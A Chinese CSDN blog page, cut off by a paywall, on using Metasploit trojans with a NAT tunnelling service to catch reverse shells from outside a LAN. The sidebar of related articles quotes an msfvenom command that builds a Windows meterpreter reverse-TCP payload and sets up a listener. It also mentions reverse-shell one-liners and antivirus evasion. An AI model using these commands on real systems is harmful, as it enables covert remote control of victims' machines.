metasploit局域网木马实现公网反弹

已于 2022-04-15 15:42:54 修改
阅读量1.3k 收藏 12
点赞数 1
分类专栏: metasploit 内网穿透 kali 文章标签: kali linux metasploit 安全 网络安全
于 2021-09-11 19:00:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43062666/article/details/120240831
版权

metasploit局域网木马实现公网反弹

众所都周知,metasploit中的venom木马一般只能用在内网环境内。
但是通过内网穿透(NAT)我们可以实现在公网环境下的反弹shell。

首先下载内网穿透软件

本人选择了花生壳

1. 添加映射

首先在花生壳里添加一个映射,应用类型勾选tcp
请添加图片描述

映射的内网主机设置为127.0.0.1,端口为4444
请添加图片描述

确保映射已经打开

最低0.47元/天 解锁文章
夏集罢侬
关注
  • 1
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
信息安全技术(二)-- 利用 metasploit 创建并反弹 shell
yi23456qi的博客
06-19 457
知识是不断从学习中得到的,经验是从尝试中得到的!
python调用msfconsole全自动永恒之蓝攻击_使用Metasploit复现永恒之蓝攻击
weixin_39839410的博客
12-22 861
1.Metaspolit介绍Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具,并保持着频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。2.术语渗透攻击(Exploit):指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞,所进行的攻击行为。攻击载荷(Payload):...
使用Metasploit进行内网渗透
m0_51468027的博客
05-07 1637
一、网络拓扑图 假如我们拿到了一台主机比如Win2008的shell,如何通过该主机进行内网渗透,拿到比如下图中数据服务器的最高权限? 二、Win2008主机上线 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.6 lport=4444 -f exe > /var/www/html/w01ke.exe msfconsole use exploit/multi/handler set payload windows/meterpr
[收藏]微软工程师现场演示禽兽木马局域网传播
Gabriel的专栏
04-12 492
  http://www.microsoft.com/emea/spotlight/sessionh.aspx?videoid=351
metasploit所有攻击方式(干货)
weixin_61216736的博客
09-30 1142
渗透 黑客 kali linux metasploit msf nmap sqlmap hydra
Python实现远程调用MetaSploit的方法
12-23
本文较为详细的讲述了Python实现远程调用MetaSploit的方法,对Python的学习来说有很好的参考价值。具体实现方法如下: (1)安装Python的msgpack类库,MSF官方文档中的数据序列化标准就是参照msgpack。 root@kali:...
Metasploit 实现木马生成、捆绑及免杀-内含源码以及设计说明书(可以自己运行复现).zip
最新发布
05-08
**Metasploit 实现木马生成、捆绑及免杀** Metasploit 是一个开源的安全漏洞测试框架,广泛用于渗透测试和安全研究。本教程将深入探讨如何利用 Metasploit 来创建、捆绑木马以及实现免杀技术。通过源码分析和设计...
Metasploit渗透测试指南.修订版
09-12
Metasploit渗透测试指南》是一本专注于网络安全领域的重要书籍,尤其对于那些希望深入了解和运用Metasploit框架进行渗透测试的专业人士来说,它提供了一条深入理解与实践的路径。Metasploit是一款强大的开源安全...
metasploit-framework-6.3.34.zip
09-17
Metasploit Framework 6.3.34:渗透测试的利器》 Metasploit Framework,简称MSF,是一款开源的安全漏洞检测工具,主要用于安全研究人员进行渗透测试和漏洞验证。这个版本是6.3.34,代表着软件的最新迭代,通常会...
53.Windows漏洞利用之Metasploit实现栈溢出攻击及反弹shell1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。前文学习:[网络
venom结合Metasploit绕过360安全卫士
andyshen1995的博客
01-20 539
原理:msfvenom是msfpayload和msfencode的结合体,利用msfvenom生成shellcode,venom生成工具使用了 一些Veil-Evasion.py, unicorn.py, powersploit.py等工具上的技术。但是venom 是基于 bash 编写的,而不是 基于 Python。相比veil evasion在payload格式...
BeFF&&Metasploit&&Venom
自学编程_youkewang.top
03-14 859
这几天学习了BeFF,发现是个很牛逼的XSS平台,感觉Kali上面的工具都很牛逼;在网上看了很多文档,几乎都是BeFF结合MSF入侵XP的文章,觉得没什么创新,于是就有了这篇文章。测试环境:Kali,Win7,Venom思路:1.使用Venom生成免杀的bat文件用作后门.2.Kali开启apache并在网页中嵌入Hook地址。3.BeFF控制被劫持浏览器访问恶意地址;这里我使用Msf中的brow...
【技术分享】linux各种一句话反弹shell总结——攻击者指定服务端,受害者主机(无公网IP)主动连接攻击者的服务端程序(CC server),开启一个shell交互,就叫反弹shell。...
djph26741的博客
07-09 1069
反弹shell背景: 想要搞清楚这个问题,首先要搞清楚什么是反弹,为什么要反弹。假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。 那么什么情况下正向连接不太好用了呢?1.某客户机中了你的网马,但是它在局域网内,你...
【Tryhackme】Blueprint(RCE攻击)
阿道夫的博客
12-20 126
本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任,也不对造成的任何误用或损害负责。
Kali渗透测试:使用Metasploit对Web应用的攻击
Liu_Bruce的博客
05-15 3513
Kali渗透测试:使用Metasploit对Web应用的攻击 Web应用程序的漏洞数量众多,这里我们以其中一个命令注入漏洞为例复现一下。这种漏洞源于Web应用程序没有对用户输入的内容进行准确的验证,从而导致操作系统执行了攻击者输入的命令。下面是一段运行在Metasploitable2靶机上的PHP脚本,它来自于DVWA,代码如下: <html> <body> <form name="ping" action="#" method="post"> &
kali渗透内网和外网
weixin_62693307的博客
04-17 6002
set payload windows/meterpreter/reverse_tcp 设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)接着我们要在Sunny-Ngrok注册登陆,这里要买个隧道,但是免费的,就是认证要花2元,这个隧道是帮助我们做内网穿透的,但这个免费的隧道服务器在美国那边,所以有的时候可能不太好用。这里设置的IP和侦听的端口后生成外网木马程序时的IP和端口时不一样的,因为我们这是内网入侵外网。
网络安全-反弹shell详解(攻击,检测与防御)
关注网络安全、云原生安全
09-21 5786
简介 如果我们需要到服务器上执行 Shell 命令,但是因为防火墙等原因,无法由客户端主动发起连接的情况,就可以使用反弹 Shell 来满足登陆和操作的需求。 原理 反弹shell bash php python nc telnet perl 参考 ​​​​​​基于主机的反弹shell检测思路 - 哔哩哔哩 常用的反弹shell总结_西部壮仔的博客-CSDN博客_反弹shell能干嘛 ...
使用msf生成木马反弹shell(windows系统)
hmysn的博客
12-23 6730
生成木马进行植入
msf 直接控制大多数设备
艾与代码
01-07 1400
这是我2016年写的一个博客,记录了一个入侵demo,原来的博客快支撑不下去了,现在转移到这来,以后还可以捡起来…以前的博客还是很稚嫩啊… 注:获取目的主机的IP以及诱使目的主机下载并运行木马可以通过局域网的监听和毒化操作实现 (2019/1/7添加:)大致流程: 1.入侵进入局域网:利用Kali 中的WiFi破解工具,稳稳当当 2.监听局域网数据流:利用arproof或ettercap或wire...
kali metasploit 木马
08-30
对于Kali LinuxMetasploit的使用,我可以提供一些基本信息。Kali Linux是一种流行的渗透测试和网络安全评估操作系统,它内置了许多用于渗透测试和漏洞利用的工具。Metasploit是一个开源的渗透测试框架,它提供了一系列工具和资源,用于测试和利用计算机系统的漏洞。 如果你想了解如何在Kali Linux中使用Metasploit来创建和使用木马,我建议你参考一些相关的教程和指南。这些资源可以帮助你学习如何使用Metasploit来进行渗透测试,但请记住,合法和道德的用途是非常重要的。在未经授权的情况下使用Metasploit来攻击他人的计算机是违法行为,这是非常严重的。 所以,请确保你只在合法的环境中使用这些工具,并遵守适用的法律和道德准则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值